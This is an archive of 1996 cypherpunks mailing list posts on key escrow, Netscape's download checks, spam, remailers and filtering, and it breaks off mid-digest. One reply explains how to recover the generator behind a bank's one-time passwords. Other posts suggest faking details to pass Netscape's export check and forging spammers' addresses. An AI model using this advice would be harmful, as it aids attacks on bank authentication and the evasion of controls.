From: Remo Pini <rp@rpini.com>
Date: Thu, 18 Jul 1996 09:28:39 +0800
To: cypherpunks@toad.com
Subject: Re: My impending death
Message-ID: <1.5.4.32.19960716210033.008e236c@193.246.3.200>
MIME-Version: 1.0
Content-Type: text/plain


At 08:22 PM 7/14/96 EDT, you wrote:
>> Since Vulis decided to drag in a disagreement from elsewhere, I have a brief
>> invitation.
>
>The cripple is lying again, as usual.  Twice he reposted to cypherpunks
>his Usenet lies with no cryptographic relevance just to slime me. Since
>not even Perry told the demented cripple to quit, I'll respond in kind.
>

I don't want to seem overly squemish, but wouldn't you agree, that stuff
that get's so "personal" as this discussion doesn't really belong here?

(Personally I even think, that such primitive mudslinging doesn't belong
anywhere)

Calm down, relax, have a cigar and be a nice boy.
----------< fate favors the prepared mind >----------
Remo Pini                      Fon 1: +41 1 350 28 82
mailto:rp@rpini.com            Fon 2: +41 1 465 31 90
http://www.rpini.com/remopini/ Fax:   +41 1 350 28 84
--------< words are what reality is made of >--------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 18 Jul 1996 16:44:31 +0800
To: David Sternlight <tomw@netscape.com (Tom Weinstein)
Subject: Re: US versions of Netscape now available
Message-ID: <2.2.32.19960717030231.00842610@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:40 PM 7/16/96 -0700, David Sternlight wrote:
>It doesn't "leak overseas" as if there were some regrettable lapse in the
>plumbing. Someone has to commit a felony violation of Federal law.
>
>David

It's not a felony without a felon.  Unless and until the feds prosecute
someone, they may claim it's a felony but they have yet to prove it in a
court of law.  It's just a matter of opinion.  If a law is overturned on
Constitutional grounds it is void ab initio.  

When I handed a copy of a label with RSA in four lines of Perl (as it then
was) on a sticker to the correspondent for the Independent (of London) at
CFP'95 in the presence of the NSA counsel, nothing happened.


DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Thu, 18 Jul 1996 09:21:24 +0800
To: David Sternlight <cypherpunks@toad.com
Subject: Re: CDT Policy Post 2.27 - No New News on Crypto: Gore Restates
Message-ID: <1.5.4.32.19960716230339.002d0458@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 10:13 15/07/96 -0700, David Sternlight wrote:
>actions in the Netherlands, the UK, and in the European
>Parliament suggest that an independent European escrow initiative might
>happen within a year. When it does it will be a trivial matter to harmonize
>it with some US offering. The mills in various countries are grinding too
>coincidentally for my taste.

I don't doubt that the Europeans are quite likely to toe the American line -- 
they not seldom do in international negotiations, plus they share the NATO 
mentality. However, that does not constitute international agreement. GAK 
basically requires companies and individuals to trust their government,
and here in India people across the political and economic spectrum would
laugh in your face at the suggestion. Also secrecy from the government is 
crucial to most businesspersons, and I cannot imagine anyone in a country 
with a repressive, inept or corrupt government agreeing to this (And further, 
trusting the far away US government, which might misuse its powers to help
its own industry in international bids).

You might say that repressive governments are not likely to ask their citizens
before agreeing internationally to GAK, but then, citizens are
not likely to ask 
their government either before using good crypto. The matter will land up before
the courts, and that will keep the situation confused for a while. With digital 
commerce seriously hindered by lack of security, I doubt the business community
will stay patient, and want to opt for a hassle-free, tried and
tested, secure and
transparent system such as pgp. Governments cannot for long ignore the wishes
of big business.

>
>Given the glacial pace with which standard integrated crypto has appeared
>on the Internet, with Navigator only going to offer the final
>link--encrypted e-mail--later this year, the above timing isn't necessarily
>one which will be left behind by independent Internet developments. And
>given the glacial pace of PGP movement toward integrated internet standard
>products, it hasn't a hope of beating the above timing to the punch.

While I share your view on the need for urgency in integrating
PGP into Internet 
standard products (and wish the programmers on these projects God-speed!) I
don't think end of this year is too late for them to come out. 

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 18 Jul 1996 17:16:26 +0800
To: cypherpunks@toad.com
Subject: Re: Banning Anonymity As Well (was Re: How I Would Ban Strong Crypto
Message-ID: <199607170719.AAA29368@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


>> Also, the key which decodes the GAKed data is just too valuable and too
>> easy to steal.
>
>Assuming the info is encrypted with one GAK key, yes.  There might be 
>a series of keys, perhaps for each escrow agency, or an id-number 
>that identifies the key.

I predict that the "Access requires two master key agents" feature that
Clipper I pretended to have* gets lost along the way.  It wasn't in
Steve Walker's software key-gakking system that he and Dorothy were
touting a year or so ago, and it's a bit of work to actually implement
in software depending on the encryption methods used.

[* The Clipper I chip didn't actually implement dual GAK agents,
though it could have without much extra effort; that was all part
of the process of loading the chip's master-key in the vault charade,
and could therefore be easily changed later... ]

#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Confuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 18 Jul 1996 18:48:35 +0800
To: Mike Rose <mrose@stsci.edu>
Subject: Re: Government: Home-Business
Message-ID: <199607170719.AAA29379@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


>>Dear Friend,
>>Thank you for your interest. Please take a minute to read this 
>>important information or simply print it out.  
>
>>All the information here is 100% accurate and can be verified
>>with the Department of HUD in Washington D.C.
Bwa-hah-hah fnord....


>I'm getting more and more of this kind of crap sent to me.  I have
>a procmail script which greps a file of undesirable addresses I've
>compiled, but that hasn't proven very useful as there aren't many
>repeat offenders.  (the procmail script is available at
>http://www.universe.digex.net/~mbr/unix/junkmail.html)
>How are other people dealing with this?

So far, I've been sending them my offer for
        SPAM PREVENTION CONSULTING!
at my usual rates of $250/hour, minimum 2 hours, plus
any legal and collection fees required.  One of them
has a human reading the responses (the CHAG folks),
who's not highly impressed (:-), while the folks with the
hundreds-of-thousands-of-spam-victims-email-addresses lists
have only robo-replied, though they've both sent a second
set of spam and are thus billable :-) 

I assume, since the robo-spammers are posting from a new email 
address this time, that either their previous ISPs have dumped them, 
or perhaps that they're using the same ISP and multiple domain names
to hide it, probably the former.  CHAG is more blockable, since they're
trying to portray an image of stability and trustworthiness,
as opposed to hit-and-run.  Meanwhile, large numbers of replies
can always get their attention; I haven't tried forging the
address of the robo-spammers' robo-reply-bot on a message to them
to see if it knows not to spam itself, but if a thousand people
were to do it, they might start to think it was a movement or something.....

#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Confuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 18 Jul 1996 18:16:15 +0800
To: declan@well.com (Declan McCullagh)
Subject: Re: How I Would Ban Strong Crypto in the U.S.
Message-ID: <199607170719.AAA29383@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:29 PM 7/16/96 -0500, Declan wrote:
>The emerging consensus is, in fact, nonexistant.
...
>Michael writes:
>>On Sun, 14 Jul 1996, Timothy C. May wrote:
>>> So, who is in this "emerging consensus"?
>>>
>>Foreign governments?
>>(Process of elimination, not inside info...)

A consensus means that everybody more or less agrees.
If I were looking for a group of people that more or less
all agreed that governments needed access to all
encrypted material within their grasp, I'd probably 
look for heads of governments, and counter-intelligence
and internal-security organs of government, and assume
that the spying-on-other-government organs of government
won't mind because they can take care of their own crypto...

As far as businesses go, the closest to a consensus I've
seen is that some vendors think they can make money selling
GAK tools, and some others don't really care governments
can read the data their customers transmit as long as
the government doesn't scare customers away.  And then there
are the folks whose current encryption is so wimpy that
40-bit-RC4 is a big step up, and they don't mind much either.

As y'all have said, it's bogus, and for government to claim
otherwise is really shoddy and dishonest, but hey, that's
government for you....

#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Confuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Thu, 18 Jul 1996 17:04:43 +0800
To: Jüri Kaljundi <jk@stallion.ee>
Subject: Re: random numbers reverse-engineering
Message-ID: <199607170739.AAA29679@cygnus.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:28 PM 7/15/96 +0300, Juri wrote:
>Is there somewhere where I could find more information on finding out RNG
>algorithms or reverse-engineering RNG's, once you have some quantity of
>random numbers generated by some RNG?
>
>For example a local bank is giving each customer a list with 600 one-time
>passwords (6-digit decimal numbers), and I believe they use the account
>number as (one of the) seeds for the RNG. Is there some program that I
>could use, together with the numbers and possible seed, to try to break
>the RNG?

If you have some guess about the algorithm being used, you can try it,
and if they've chosen a weak algorithm, you may be successful.

For instance, if they use a simple Linear Congruential Multiplicative PRNG,
        X[n+1] = ( a * X[n] + c ) mod m 
and if you've got a list of 600 one-time passwords, you can get a good
approximation to m by taking the largest password and looking for
prime numbers slightly higher than it.  You can then try solving
for a and c.

On the other hand, if the account number is large, and each X[n+1] is
the low-order 6 digits of Y'[n+1] = MD5(Y[n]) and Y[0] = account number,
then it'll be much harder to reverse-engineer.

#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Confuse Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Block <jpb@miamisci.org>
Date: Thu, 18 Jul 1996 10:26:04 +0800
To: "Mark O. Aldrich" <maldrich@grci.com>
Subject: Re: Opiated file systems
In-Reply-To: <Pine.LNX.3.94.960716090027.5360D-100000@switch.sp.org>
Message-ID: <v03007604ae1225be8464@[192.168.1.69]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:44 AM -0400 7/16/96, Mark O. Aldrich wrote:
>One problem, however, would be how to keep the "decoy" data, accessible
>with only the ambush key, "fresh" in that it must undergo a certain amount
>of
>turbulence to appear real.  The two file systems would essentially have to
>mirror each other, one with the juicy bits and one with the decoy bits.
>It would seem to be practically impossible to just build two file systems
>as one would 'disappear' when only the ambush key was used.  Wouldn't it
>be sort of obvious that something was wrong if half the disk vanished?

As far as churning goes, why not just mount both the decoy and the
encrypted filesystems simultaneously?  Have a perl script (stored on the
hidden volume of course) that automatically decodes random images from
alt.binaries.pictures.* into the decoy system and nukes the oldest decoy
files.  And go ahead and keep a copy of all your assorted /var/named &
other config files in there too.

Honest officer, I keep that partition unmounted so that a system crash is
less likely to clobber my painfully constructed configuration files - and
it's encrypted so that crackers won't be able to alter my configuration
backup to add security holes.

Let them go nuts trying to un-stego the smut images once you've given them
the duress key.


Joseph Block <jpb@miamisci.org>

"We can't be so fixated on our desire
 to preserve the rights of ordinary Americans ..."
 -- Bill Clinton  (USA TODAY, 11 March 1993, page 2A)
PGP 2048bit-Fingerprint: F8 A2 A5 15 56 42 9B 16  3F BD 57 0F 8A ED E3 21






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex de Joode <usura@replay.com>
Date: Thu, 18 Jul 1996 12:36:03 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape download requirements
Message-ID: <199607162331.BAA02617@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <199607161346.JAA07227@jekyll.piermont.com> you wrote:

: Jeff Weinstein writes:
: >   If you are not comfortable providing this information, then you
: > may either run the export version, or purchase the retail navigator
: > package, which also includes the US only version when sold in the US.

: But you can't buy the Linux or other similar versions, so this is not
: an option for many of us.

Well one 'ITAR gangsta' can alwas upload the linux version to a
'liberated ftp site'.

It seems that the program checks something in the supplied
phone, area code and zip code, so why not do a 'whois netscape.com'
and enter the Netscape Communications Corps. data ? Afterall whois
to know ....

(for the humorly impaired: *g*)

bEST Regards,
--

	-AJ-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Cerridwyn Llewyellyn <ceridwyn@wolfenet.com>
Date: Thu, 18 Jul 1996 15:16:32 +0800
To: cypherpunks@toad.com
Subject: Re: preamble (was Re: Markoff on Clipper III)
Message-ID: <2.2.32.19960717085253.00691dbc@gonzo.wolfenet.com>
MIME-Version: 1.0
Content-Type: text/plain



At 10:20 AM 7/15/96 -0700, you wrote:
>At 3:50 AM -0700 7/15/96, Duncan Frissell wrote:
>>At 09:35 PM 7/14/96 -0700, David Sternlight wrote:
>>>Did you miss the part in the Constitution about "provide for the common
>>>defence"
>>That's a meaningless part of the Preamble.
>
>Anyone who thinks substantive parts of the Preamble are "meaningless" is
>deserving only of contumely. Perhaps you should review your high school
>civics course--you did have one of those, yes?

I think what he meant (not that I'm trying to speak for him) is that
the preamble was intended as an explanation of why the constitution was 
written, and not to be taken as an actual part of the constitution as such.
//cerridwyn//





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Greg Broiles <gbroiles@netbox.com>
Date: Thu, 18 Jul 1996 15:28:58 +0800
To: cypherpunks@toad.com
Subject: Re: Cookie alternatives
Message-ID: <2.2.16.19960717095113.23f7981c@mail.io.com>
MIME-Version: 1.0
Content-Type: text/plain


Hal Finney wrote:

>It is interesting to consider how shopping carts might be done without
>cookies and similar technologies which allow servers to get more
>information about me than necessary.

One partial solution would be to turn cookies into nonces - instead of
using server-supplied cookies, which may or may not contain hashed/hidden
information, client software (and by extension, the human(s) in charge of it) could control the generation and modification of cookies.

Some cookie uses are predictable - e.g., "Put the current date and time in the cookie", or "Put the user's E-mail address in the cookie". The user could be presented with dialog boxes asking "Server sneaky.tricky.com would like to set a cookie which will record the date and time of this visit. OK?" or "Server sneaky.tricky.com would like Netscape to generate a random number to keep track of your visits. OK?" A switch from server-generated cookies to client-generated cookies shouldn't involve too many changes on the client software side.

(One danger which occurs to me about such a scheme is the potential leakage of client state information, assuming that the algorithm used to generate the pseudorandom cookies is or will be known to attackers.) 

--
Greg Broiles                |"Post-rotational nystagmus was the subject of
gbroiles@netbox.com         |an in-court demonstration by the People
http://www.io.com/~gbroiles |wherein Sgt Page was spun around by Sgt
                            |Studdard." People v. Quinn 580 NYS2d 818,825.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Middleman Remailer <middleman@rigel.infonex.com>
Date: Thu, 18 Jul 1996 15:29:37 +0800
To: alt.privacy.anon-server@myriad.alias.net
Subject: New MiddleMan Remailer! (reno)
Message-ID: <Pine.SOL.3.91.960717070232.28509A@rigel.infonex.com>
MIME-Version: 1.0
Content-Type: text/plain


ATTENTION *** ATTENTION *** ATTENTION *** ATTENTION

I'm proud to announce the birth of a new middleman remailer! This new 
remailer uses John Perry's middleman mixmaster code and is located at 
cyberpass.net thanks to Lance Cottrell. Here are the statistics:

NAME: Janet Reno
SHORTNAME: reno
ADDRESS: middleman@cyberpass.net
MIXMASTER KEY:
reno middleman@cyberpass.net b864a69c831f38593d24187122e954f6 2.0.3

-----Begin Mix Key-----
b864a69c831f38593d24187122e954f6
258
AASx+Qa23TBIu7MTGZQekob8EJrxyhNPYPBRhzZC
17F5scF1MzFIk1PhY0O78QN29aYMHlo99jE37Hlh
MvJpQ7HUrqnklRIaRZJBLxUcuBoTckMltIJEdh1r
9Lbh8e5AIoqPr6c9SAxr7Q3v2cthkwuBYEiWDlui
0vGtsX/EC6lTdwAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAQAB
-----End Mix Key-----

John Perry, will you please add my remailer to your list when you get a 
chance?

                                          middleman@cyberpass.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "sfuze@tiac.net" <sfuze@sunspot.tiac.net>
Date: Thu, 18 Jul 1996 15:09:54 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: Seek-and-Destroy
In-Reply-To: <Pine.LNX.3.93.960715161736.171A-100000@smoke.suba.com>
Message-ID: <Pine.SUN.3.91.960717082922.1095E-100000@sunspot.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 15 Jul 1996, snow wrote:

> > The sysadmins for xxx.lanl.gov don't like robots visiting their web site,
> 
>      They also aren't real happy with PC's, Mac's, or Netscape. 

I visited too.

They don't like lynx either. :)

-Millie




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Banisar <tc@mindvox.com>
Date: Thu, 18 Jul 1996 15:17:39 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Intl consensus (was Re: How I Would Ban Strong Crypto in the U.S.)
In-Reply-To: <Pine.SUN.3.94.960715100239.25657F-100000@viper.law.miami.edu>
Message-ID: <Pine.SOL.3.91.960717082516.6065A-100000@phantom>
MIME-Version: 1.0
Content-Type: text/plain



Not really. At the last OECD meeting in Paris a couple of weeks ago, 
there was no great love by quite a few countries for key escrow. The 
scandavian countries were pretty united against and all sorts of other 
raised objections. (tho some of those objections were to the US 
ramrodding key escrow through OECD).

BTW. Those wizards at Wired have gotten our favorite spook Stewart Baker 
to write an article for an upcome issue talking about how the rest of the 
world save Japan loves key escrow and those big bad Japanese are 
thwarting the rest of the worlds "consensus". Its quite a load of 
inaccurate shit but our effort to rebut it was rejected by wired (I guess 
it wasnt trite enough for them).

-d


On Mon, 15 Jul 1996, Michael Froomkin wrote:

> On Sun, 14 Jul 1996, Timothy C. May wrote:
> 
> > So, who is in this "emerging consensus"?
> > 
> Foreign governments?  
> (Process of elimination, not inside info...)
> 
> 
> 
> A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
> Associate Professor of Law | 
> U. Miami School of Law     | froomkin@law.miami.edu
> P.O. Box 248087            | http://www.law.miami.edu/~froomkin
> Coral Gables, FL 33124 USA | It's hot here.  And humid.
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "sfuze@tiac.net" <sfuze@sunspot.tiac.net>
Date: Thu, 18 Jul 1996 14:48:46 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <Pine.SV4.3.91.960715193244.5030C-100000@larry.infi.net>
Message-ID: <Pine.SUN.3.91.960717083215.1095G-100000@sunspot.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain



On Mon, 15 Jul 1996, Alan Horowitz wrote:

>     Your straining my credulity to claim that you can't get ahold of the 
> regular phone number of them.   Come on, are you 7 years old?

Oh really?

I got off the phone yesterday with the people who handle my student loans.
It seems they don't "have" a regular number.

*right*.

It took me about 15 calls on their part, and alot of pissiness on my part
to finally get a local (Ohio) number for them.  

Gotta love those collection agencies.

And NO they don't list anything other than their 800 number, and refuse 
to give it out.

Who is paranoid here?

--Millie




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "sfuze@tiac.net" <sfuze@sunspot.tiac.net>
Date: Thu, 18 Jul 1996 13:47:27 +0800
To: Steven Seyffert <steven@knoware.nl>
Subject: Re: #E-CASH: PRODUCT OR SERVICE?
In-Reply-To: <199607152349.BAA14860@utrecht.knoware.nl>
Message-ID: <Pine.SUN.3.91.960717083625.1095I-100000@sunspot.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


I'm finding it difficult here, aside from purely technical terms,
to figure out how ecash is really different from using your ATM card
to pay for groceries at the supermarket.

Same Same, only even less secure.


-Millie





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "sfuze@tiac.net" <sfuze@sunspot.tiac.net>
Date: Thu, 18 Jul 1996 16:02:59 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <v02120d03ae10e4a442cf@[192.0.2.1]>
Message-ID: <Pine.SUN.3.91.960717083854.1095J-100000@sunspot.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 16 Jul 1996, Lucky Green wrote:

> How do you get a hold of the phone number if you don't know the location of
> the company, they aren't on the net, and don't have the US phone numbers
> CD-ROM handy? I am 33 and have yet to figure this one out...

For most companies you can call the library's research section.  As long 
as you don't have a mean librarian they will usually try to help.

Unlisted ones are another story though (see my previous post)


--Millie




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Thu, 18 Jul 1996 16:08:13 +0800
To: Rabid Wombat <wombat@mcfeely.bsfs.org>
Subject: Re: Washington Post -- "Block but Verify"
Message-ID: <2.2.32.19960717134050.00839ff8@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:33 PM 7/16/96 -0400, Rabid Wombat wrote:
>
>A user-selectable menu would be, umm, interesting ... just how could one 
>describe, in terms offensive to absolutely no one, what one's product is 
>offering to block?

Quite easily.  The PICS standard has categories and software like CytberPatrol 
lets parents select by category.  There is a granularity problem of course.  


          57.  The CyberNOT list contains approximately 7000
sites in twelve categories.  The software is designed to enable
parents to selectively block access to any or all of the twelve
CyberNOT categories simply by checking boxes in the Cyber Patrol
Headquarters (the Cyber Patrol program manager).  These
categories are:
          Violence/Profanity:  Extreme cruelty, physical or
          emotional acts against any animal or person which are
          primarily intended to hurt or inflict pain.  Obscene
          words, phrases, and profanity defined as text that uses
          George Carlin's seven censored words more often than
          once every fifty messages or pages.

          Partial Nudity:  Full or partial exposure of the human
          anatomy except when exposing genitalia.

          Nudity:  Any exposure of the human genitalia.

          Sexual Acts (graphic or text):  Pictures or text
          exposing anyone or anything involved in explicit sexual
          acts and lewd and lascivious behavior, including
          masturbation, copulation, pedophilia, intimacy and
          involving nude or partially nude people in
          heterosexual, bisexual, lesbian or homosexual
          encounters.  Also includes phone sex ads, dating
          services, adult personals, CD-ROM and videos.

          Gross Depictions (graphic or text):  Pictures or
          descriptive text of anyone or anything which are
          crudely vulgar, deficient in civility or behavior, or
          showing scatological impropriety.  Includes such
          depictions as maiming, bloody figures, indecent
          depiction of bodily functions.

          Racism/Ethnic Impropriety:  Prejudice or discrimination
          against any race or ethnic culture.  Ethnic or racist
          jokes and slurs.  Any text that elevates one race over
          another.

          Satanic/Cult:  Worship of the devil; affinity for evil,
          wickedness.  Sects or groups that potentially coerce
          individuals to grow, and keep, membership.

          Drugs/Drug Culture:  Topics dealing with the use of
          illegal drugs for entertainment.  This would exclude
          current illegal drugs used for medicinal purposes
          (e.g., drugs used to treat victims of AIDS).  Includes
          substances used for other than their primary purpose to
          alter the individual's state of mind such as glue
          sniffing.

          Militant/Extremist:  Extremely aggressive and combative
          behaviors, radicalism, advocacy of extreme political
          measures.  Topics include extreme political groups that
          advocate violence as a means to achieve their goal.

          Gambling:  Of or relating to lotteries, casinos,
          betting, numbers games, on-line sports or financial
          betting including non-monetary dares.

          Questionable/Illegal:  Material or activities of a
          dubious nature which may be illegal in any or all
          jurisdictions, such as illegal business schemes, chain
          letters, software piracy, and copyright infringement.

          Alcohol, Beer & Wine:  Material pertaining to the sale
          or consumption of alcoholic beverages.  Also includes
          sites and information relating to tobacco products.


Homosexual sites were excluded under "Sexual Acts" because many have links
to personal ads or more explicit sites and the gun sites were excluded under
"Militant/extremist."
  
There will always be interpretation problems obviously.  Actally, the
individual is the best at filtering his own stuff.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Thu, 18 Jul 1996 12:31:37 +0800
To: Adam Shostack <adam@homeport.org>
Subject: Re: Netscape download requirements
In-Reply-To: <199607161436.JAA27358@homeport.org>
Message-ID: <Pine.GUL.3.94.960717095242.27816B-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 16 Jul 1996, Adam Shostack wrote:

> First off, I applaud Netscape for making the US version available for
> download.  All of my comments here should be taken as questioning the
> why's, not suggesting that the implementation is so onerous Netscape
> shouldn't have done it.  Although, you might want to add a link to a
> page decrying the kafka-esque experience; perhaps Matt's 'My life as
> an arms smuggler?'

It's there, but it's subtle (they must be polite, you know). Read the
download FAQ closely, especially the #bigbrother anchor.

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMe0bE5NcNyVVy0jxAQFvPAIAiVyWQcu4O/cvYL5ws7FCTfHVVF9HTGYx
jbSTQ+e3tSk10CrJQ8pqlGsissDjEhz135vKGy1cMlbqtv+/S8MHQw==
=GWA5
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.net>
Date: Thu, 18 Jul 1996 13:53:52 +0800
To: cypherpunks@toad.com
Subject: recent spam: government home-business
Message-ID: <199607171709.KAA14537@niobe.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


	Please don't mail mwci.net about the recent spam to
cypherpunks. The spam came from interramp:

> > >From cypherpunks-errors@toad.com  Tue Jul 16 12:32:32 1996
> > Message-Id: <199607160811.EAA00698@smtp1.interramp.com>
> > Comments: Authenticated sender is <cd004561@pop3.interramp.com>
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
> > From: "Creative Financial Alternatives" <homebiz@flock.mwci.net>
> > To: homebiz@flock.mwci.net
> > Date: Tue, 16 Jul 1996 04:11:56 +0000

{0} infinity:mail/lists 10:05am [10] > whois interramp-dom
PSINet, Inc (INTERRAMP-DOM)
   510 Huntmar Park Drive
   Herndon, VA 22070
   USA

   Domain Name: INTERRAMP.COM

   Administrative Contact:
      Administration, PSINet Domain  (PDA4)  psinet-domain-admin@PSI.COM
      (703) 904-4100
   Technical Contact, Zone Contact:
      Network Information and Support Center  (PSI-NISC)  hostinfo@psi.com
      (518) 283-8860
   Billing Contact:
      Andrews, Ken  (KA16)  domain-fee-contact@PSI.COM
      703-904-4100

   Record last updated on 22-Feb-96.
   Record created on 14-Apr-94.

   Domain servers in listed order:

   NS.PSI.NET                   192.33.4.10
   NS2.PSI.NET                  38.8.50.2
   INTERRAMP.COM                38.8.17.2


The InterNIC Registration Services Host contains ONLY Inte

-- 
Sameer Parekh					Voice:   510-986-8770
Community ConneXion, Inc.			FAX:     510-986-8777
The Internet Privacy Provider
http://www.c2.net/				sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: janke@unixg.ubc.ca
Date: Thu, 18 Jul 1996 11:18:53 +0800
To: jsw@netscape.com
Subject: Re: Netscape download requirements
In-Reply-To: <31EB61E5.520E@netscape.com>
Message-ID: <m2vifm22lk.fsf@clouds.heaven.org>
MIME-Version: 1.0
Content-Type: text/plain



Why is the 128-bit version available only in the United States?
It can't be due to ITAR since export of crypto to Canada is ok.
Does it have something to due with RSA only being patented in 
the United States so that's the only place RSADSI wants it
used? I noticed that Netscape's SSL implementation is available
only to developers in the U.S. as well. 

-- 
Leonard Janke (janke@unixg.ubc.ca)
NEW pgp key id 0x6BF11645 (0xF4118611 eaten by /dev/fd0 :( )






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Thu, 18 Jul 1996 13:27:29 +0800
To: perry@piermont.com
Subject: Re: Sternlight on C'punks
In-Reply-To: <199607161639.MAA00191@jekyll.piermont.com>
Message-ID: <199607171622.LAA04536@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Perry E. Metzger wrote:
> 
> "Peter D. Junger" writes:
> > How does one set up a kill-file for a mailing list?  I run a Linux box
> > with sendmail and use the MH mail system.
> > 
> > My best guess is that I will have to install procmail, but would like
> > your advice before going to a lot of labor.
> 
> You can use procmail. If you use MH, you can also use a combination of
> "pick" and "rmm" to nuke a specified list of users before going
> through your mail.
> 

Here's the procmailrc recipe that I use for cypherpunks: 

:0
* ^(Sender|From): owner-cypherpunks@toad.com
{ 
  :0
  * ? fgrep -q -i -f $HOME/.procmail/killfile.cpunks
  /dev/null

  :0:
  $CRYPTO
}


All you have to do add a new entry to your killfile is to add a new
line to te file ~/.procmail/killfile.cpunks which is real easy.


	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.net>
Date: Thu, 18 Jul 1996 11:10:30 +0800
To: ericm@lne.com (Eric Murray)
Subject: Re: spam suckers (was Re: Chancellor Group....)
In-Reply-To: <199607121652.JAA28494@slack.lne.com>
Message-ID: <199607171827.LAA12519@niobe.c2.net>
MIME-Version: 1.0
Content-Type: text/plain


	FYI: I've been forwarding complaints about the moneyworld spam
to the following addresses:

dyno@cyberspace.com
barer@cyberspace.com
abuse@mci.net
enforcement@sec.gov

-- 
Sameer Parekh					Voice:   510-986-8770
Community ConneXion, Inc.			FAX:     510-986-8777
The Internet Privacy Provider
http://www.c2.net/				sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Thu, 18 Jul 1996 15:06:55 +0800
To: cypherpunks@toad.com
Subject: 119_816
Message-ID: <199607171129.LAA24955@pipe2.ny1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   6-17-96. NYP: 
 
   "11 Officers Are Accused of Failure to pay Taxes. Claims of 
   Sovereignty and 98 Dependents." 
 
      At least 11 New York City police officers have been 
      accused of failing to pay any Federal taxes for several 
      years by declaring they each had 98 dependents and by 
      insisting that the Government had no right to tax them. 
      The officers relied on a package of instructions that 
      described how to avoid paying taxes by declaring that 
      they were sovereign citizens who did not have to pay 
      taxes. 
 
   "16 Indicted On Charges Of Internet Pornography." 
 
      Exon-Reno-ing into one of the more distant frontiers of 
